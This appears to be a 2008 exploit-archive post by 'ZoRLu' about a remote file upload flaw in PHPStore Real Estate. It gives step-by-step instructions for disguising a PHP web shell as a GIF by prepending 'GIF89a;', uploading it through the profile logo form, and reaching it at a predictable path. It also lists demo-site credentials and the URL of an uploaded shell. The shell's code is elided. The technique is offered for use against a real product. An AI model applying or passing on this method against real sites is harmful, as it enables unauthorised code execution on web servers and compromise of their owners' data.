[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPStore Real Estate Remote File Upload Vulnerability
# Published : 2008-11-10
# Author : ZoRLu
# Previous Title : AJSquare Free Polling Script (DB) Multiple Vulnerabilities
# Next Title : AJ Auction Authentication Bypass Vulnerability
PHP Store Real Estate Remote File Upload
Author: ZoRLu msn: trt-turk@hotmail.com
home: www.z0rlu.blogspot.com
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-----------------------------------------
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
---------------------------------------------
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php
http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php )
------------------------------------------------
thanks: str0ke & yildirimordulari.org & darkc0de.com
# www.Syue.com [2008-11-10]